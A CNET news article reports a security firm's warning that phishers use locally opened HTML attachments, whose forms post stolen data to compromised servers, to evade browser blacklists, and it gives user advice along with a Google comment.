X

Phishers use HTML attachments to evade browser blacklists

Successful attacks require recipients of phishing e-mails to open an HTML attachment and fill out a form before data is sent to a compromised Web server for harvesting.

Elinor Mills Former Staff Writer
Elinor Mills covers Internet security and privacy. She joined CNET News in 2005 after working as a foreign correspondent for Reuters in Portugal and writing for The Industry Standard, the IDG News Service and the Associated Press.
Elinor Mills
2 min read

This screenshot shows an example of a phishing attack that encourages the recipient to download the HTML attachment and provide information. Note the poor grammar, "required informations," which should be a red flag.
Shown is an example of a phishing attack that encourages the recipient to download the HTML attachment and provide information. Note the poor grammar, "required informations," which should be a red flag. M86

To get around phishing blacklists in browsers, scammers are luring people by using HTML attachments instead of URLs, a security firm is warning.

Chrome and Firefox are good at detecting phishing sites and warning Web surfers via a browser notice when they are about to visit a site that looks dangerous. So good, in fact, that scammers are resorting to a new tactic to lure victims into their traps via e-mails--attaching HTML files that are stored locally when they are opened, according to an M86 blog post yesterday.

After the user fills in a form with the information the scammers want to steal and clicks "submit," the HTML form sends the data through a POST request to a PHP (Hypertext Preprocessor) script hosted on a legitimate Web server that has been compromised. (POST is used when a computer is sending data over the Internet to a Web server.) Because few PHP URLs are reported as abuse, this action does not trigger a warning from the browser, M86 said.

"Months-old phishing campaigns remain undetected, so it seems this tactic is quite effective," the blog post says. "Logically, however, the browser should be able to detect a URL when the browser sends the POST request."

The phishing URLs alone without the HTML form are hard to verify because the PHP script runs in the server and no visible HTML is displayed after clicking the submit button, other than redirecting to a page belonging to the company the scammer was pretending to be, the post says.

To protect against this, people should avoid opening HTML attachments if the e-mail seems suspicious and not provide any information in forms. Financial institutions do not send such attachments to customers.

While many people will click on a link in an e-mail that looks like it comes from their bank, fewer are likely to open the HTML attachment.

Mozilla representatives did not provide comment on the report today. Meanwhile, a Google spokesperson provided this comment: "Google has a number of defenses against phishing sites to help protect our users. For example, Gmail checks HTML attachments for phishing sites and displays a warning to users when one is detected. We always encourage users to be cautious when handling unexpected attachments and when providing personal information requested by email."